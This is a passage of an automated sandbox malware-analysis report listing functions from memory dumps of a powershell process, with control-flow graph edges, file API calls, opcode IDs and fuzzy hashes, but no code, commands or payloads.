                                                                                                            control_flow_graph 105 493ad88-493ad8a 106 493ad90-493addc 105->106 107 493ad8c-493ad8f 105->107 109 493ade4-493ae1f CreateFileW 106->109 110 493adde-493ade1 106->110 107->106 111 493ae21-493ae27 109->111 112 493ae28-493ae45 109->112 110->109 111->112
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,0493AD07,00000000,00000000,00000003,00000000,00000002), ref: 0493AE12
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.401755136.0000000004930000.00000040.00000800.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_4930000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: 2acfb86bded04d4fe38c72ae04e56cd5158f672621b5d5cffab6e4dc6b91835b
                                                                                                            • Instruction ID: 8406432a4b869b14a4bb0b3ccc8544ad84847e9b3b699d0b0123a53c82123872
                                                                                                            • Opcode Fuzzy Hash: 2acfb86bded04d4fe38c72ae04e56cd5158f672621b5d5cffab6e4dc6b91835b
                                                                                                            • Instruction Fuzzy Hash: DA2137B5D00259AFCF10CF9AD844ADEFBB8FB48314F10812AE918A7610C374A950CFA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0493A644 Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 115 493a644-493addc 118 493ade4-493ae1f CreateFileW 115->118 119 493adde-493ade1 115->119 120 493ae21-493ae27 118->120 121 493ae28-493ae45 118->121 119->118 120->121
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,0493AD07,00000000,00000000,00000003,00000000,00000002), ref: 0493AE12
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.401755136.0000000004930000.00000040.00000800.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_4930000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: c65b1eb145d9c37d81cec128b0614d5b89b5e87d93c8aba0a04da41d9fafdd64
                                                                                                            • Instruction ID: 0281f2d8a322fcdf433fb885260dd00dad527dab073014c7a114682bb40a8875
                                                                                                            • Opcode Fuzzy Hash: c65b1eb145d9c37d81cec128b0614d5b89b5e87d93c8aba0a04da41d9fafdd64
                                                                                                            • Instruction Fuzzy Hash: 9A2104B2D04259AFCF10CF9AD944ADEFBB4FB48314F14812AE919A7610C375AA54CFE1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04931240 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 124 4931240-493128a 127 4931292-49312bd GetFileAttributesW 124->127 128 493128c-493128f 124->128 130 49312c6-49312e3 127->130 131 49312bf-49312c5 127->131 128->127 131->130
                                                                                                            APIs
                                                                                                            • GetFileAttributesW.KERNELBASE(00000000), ref: 049312B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.401755136.0000000004930000.00000040.00000800.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_4930000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AttributesFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 3188754299-0
                                                                                                            • Opcode ID: 0530389601d464ed6bfcf89240a0c61b7318e9ec9c39c2d28553837b805d1498
                                                                                                            • Instruction ID: 40fb799f411de02232ff5e4ce7c01798c6ee096893d1530e4b7464e414cfa9ba
                                                                                                            • Opcode Fuzzy Hash: 0530389601d464ed6bfcf89240a0c61b7318e9ec9c39c2d28553837b805d1498
                                                                                                            • Instruction Fuzzy Hash: B51112B1D006599BCB10CF9AD945B9EFBF8BB48324F10812AE819B3710D774AA44CFE1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 049312E4 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 134 49312e4-49312f0 135 49312a2-49312bd GetFileAttributesW 134->135 136 49312f2-4931374 134->136 138 49312c6-49312e3 135->138 139 49312bf-49312c5 135->139 139->138
                                                                                                            APIs
                                                                                                            • GetFileAttributesW.KERNELBASE(00000000), ref: 049312B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.401755136.0000000004930000.00000040.00000800.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_4930000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AttributesFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 3188754299-0
                                                                                                            • Opcode ID: 4b8e9d9ba1df875be05d7a9a72bde3b01290e423e889a6e1e3e882f95a97a583
                                                                                                            • Instruction ID: ea5bc12039fedf52d34389baffa877f8b581464b42c37df83b79cc804c9652ed
                                                                                                            • Opcode Fuzzy Hash: 4b8e9d9ba1df875be05d7a9a72bde3b01290e423e889a6e1e3e882f95a97a583
                                                                                                            • Instruction Fuzzy Hash: 21F02B71D083948FDB118BE998453D9FBF0FB0A359F04C19AD044E7261D378A445CBD1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 072CF080 Relevance: .3, Instructions: 263COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 463 72cf080-72cf08d 464 72cf09f-72cf0c3 463->464 465 72cf08f-72cf092 463->465 470 72cf0c9-72cf0eb 464->470 471 72cf34b-72cf359 464->471 466 72cf33d-72cf34a 465->466 467 72cf098-72cf09e 465->467 470->471 476 72cf0f1-72cf111 470->476 474 72cf36c-72cf397 471->474 475 72cf35b-72cf36b 471->475 475->474 476->471 479 72cf117-72cf16a 476->479 479->471 487 72cf170-72cf1a0 479->487 491 72cf1a8-72cf2e2 487->491 491->471 513 72cf2e4-72cf33c call 72c9be0 491->513
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.431589631.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c56ae889a3c4016b7f2aee1836523114a43a2506fb1a120ed43ac9992108f6f2
                                                                                                            • Instruction ID: 8f87dbc80689f40c97c67b9fb48568bbac5d5a9ba99ebbc6c25ae2244d2382bb
                                                                                                            • Opcode Fuzzy Hash: c56ae889a3c4016b7f2aee1836523114a43a2506fb1a120ed43ac9992108f6f2
                                                                                                            • Instruction Fuzzy Hash: 22918F383443019FE725AB349852B2E7BA3ABC6715F24456AE106AF3D1DEB5EC428750
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 072C8D90 Relevance: .2, Instructions: 187COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.431589631.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f38e92f13d03d47f15a70a051eb4b5f84cd572e53f4029334abb20cb359f5702
                                                                                                            • Instruction ID: 0a19ccadd269cf4045fdc568fb29fb9320392fed92bee521859268323d572af8
                                                                                                            • Opcode Fuzzy Hash: f38e92f13d03d47f15a70a051eb4b5f84cd572e53f4029334abb20cb359f5702
                                                                                                            • Instruction Fuzzy Hash: 5D61AEB4A102059FCB14EFB8C4146AEBBF2EF89314F05862DE806E7391DB399C45CB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 072C8D80 Relevance: .1, Instructions: 124COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.431589631.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 04b2330a575bc360e9be54dfacc7e7cacad54e066ef2b8d073893e4cf43caeb9
                                                                                                            • Instruction ID: 221aee7e7d9eb89c3dfc12190716269d7d2d5621ec1511ccc703f88044e27bbb
                                                                                                            • Opcode Fuzzy Hash: 04b2330a575bc360e9be54dfacc7e7cacad54e066ef2b8d073893e4cf43caeb9
                                                                                                            • Instruction Fuzzy Hash: 7E416BB4A202059FDB14DFA8C444AEDBBF2AF99314F14862AE816B7390DB759845CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 072C7D78 Relevance: .1, Instructions: 57COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.431589631.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ce95dc811f587213bd7deb130c35ed6c557be74a10e9f76ae3c2763e88f2dcef
                                                                                                            • Instruction ID: b654365958b83c60a328634f0c20f7fb72e56b7e9f48267bef0b8d4feb47e899
                                                                                                            • Opcode Fuzzy Hash: ce95dc811f587213bd7deb130c35ed6c557be74a10e9f76ae3c2763e88f2dcef
                                                                                                            • Instruction Fuzzy Hash: 162135B1D1465A9BCB10CF9AC94579EFBB4FB48320F00812AE818A3640D378A540CFA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 072C9040 Relevance: .1, Instructions: 56COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.431589631.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b8e76b46fa3824e484c03139e71272d73f448265201fa5badeefc14d7c66f48b
                                                                                                            • Instruction ID: baf0f2ce2584e2dae66709c5f63d8150f1e0e888fd31f2e2017a52cbd899c4f3
                                                                                                            • Opcode Fuzzy Hash: b8e76b46fa3824e484c03139e71272d73f448265201fa5badeefc14d7c66f48b
                                                                                                            • Instruction Fuzzy Hash: E401B5B1734A224BF720DA79D400BA273D8DB50361F04467DE98DCB691D766F8C08781
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 072C90D0 Relevance: .1, Instructions: 56COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.431589631.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d9a565ed31e8869ae27e4f8c86e3ae169f1fd1d6c38ee40261e89cf25f635da1
                                                                                                            • Instruction ID: ea6bf8acf51606769acf7fd0ed5c6bae8c6640df053e61c8b71400af8601b51e
                                                                                                            • Opcode Fuzzy Hash: d9a565ed31e8869ae27e4f8c86e3ae169f1fd1d6c38ee40261e89cf25f635da1
                                                                                                            • Instruction Fuzzy Hash: CF2135B1C0065A9FDB10CF9AD9457EEFBB4BF48320F15812AD418B3640D374A940CFA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 072C9030 Relevance: .0, Instructions: 48COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.431589631.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5d174d6564716147333d522c7553c23a6d1e1690ead3242df31ee48706e8346d
                                                                                                            • Instruction ID: 5e50ccbbcb5b96dd75778dc19032840c7f27620fa757be74f7e8efa572e6cec6
                                                                                                            • Opcode Fuzzy Hash: 5d174d6564716147333d522c7553c23a6d1e1690ead3242df31ee48706e8346d
                                                                                                            • Instruction Fuzzy Hash: 2A01F5B16387128FF721CE25C400B6237E4DF51310F0946ADD885CB6A2D765FC84C791
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00C0D005 Relevance: .0, Instructions: 45COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.398894479.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_c0d000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7543ade0bb0a0f53f13e7b1c69ff058359535654c96a23b70ee76ea6eee0c4ad
                                                                                                            • Instruction ID: 88922cac5aa90a4489a7a5e3ab8108a70b544795e18a84592b56da949cb25d84
                                                                                                            • Opcode Fuzzy Hash: 7543ade0bb0a0f53f13e7b1c69ff058359535654c96a23b70ee76ea6eee0c4ad
                                                                                                            • Instruction Fuzzy Hash: E301406140E3C05ED7128B258C94B52BFB4EF43224F1980DBD9998F2D3C2695949C772
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00C0D01D Relevance: .0, Instructions: 45COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.398894479.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_c0d000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 61b339762fb2cc61737498a94af8615a2243a9c3dfca240056e4ac190b6d6569
                                                                                                            • Instruction ID: 47b05f226f08dd3798b803b61d3e4918f913e3dda508c03074c104345735a68a
                                                                                                            • Opcode Fuzzy Hash: 61b339762fb2cc61737498a94af8615a2243a9c3dfca240056e4ac190b6d6569
                                                                                                            • Instruction Fuzzy Hash: 4101F270908380AAE7208A66CC84B66BBD8EF4132CF18C11AED5E4B2C2C3799945C6B1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 072CC413 Relevance: .0, Instructions: 21COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.431589631.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ea115141def9ce6c436ca37d245bbeaee8f3703d82a6d936149d674892dfe7c7
                                                                                                            • Instruction ID: 4a5cb4c4abcb0c5f0277a7c1a7c203b85729f4d4fbc0692d3090b59200eca467
                                                                                                            • Opcode Fuzzy Hash: ea115141def9ce6c436ca37d245bbeaee8f3703d82a6d936149d674892dfe7c7
                                                                                                            • Instruction Fuzzy Hash: CAE026762106008FE310EB10E4413ADB3A2EBC8354F00C52ED15AC3641CF34A8469B50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 072CC069 Relevance: .0, Instructions: 21COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.431589631.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: caeffa36edd4218eb749334920197951b35e27ab83ec292a57185f2c0b6412f3
                                                                                                            • Instruction ID: 08f4863e445dc5d3584b3c6c936095e997fead72064a8328fa10714c95bdb92c
                                                                                                            • Opcode Fuzzy Hash: caeffa36edd4218eb749334920197951b35e27ab83ec292a57185f2c0b6412f3
                                                                                                            • Instruction Fuzzy Hash: 91E02C766245008FE720EB00E4413AEB3A6EBC8320F00893ED15AC3681CF75A84A9BA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%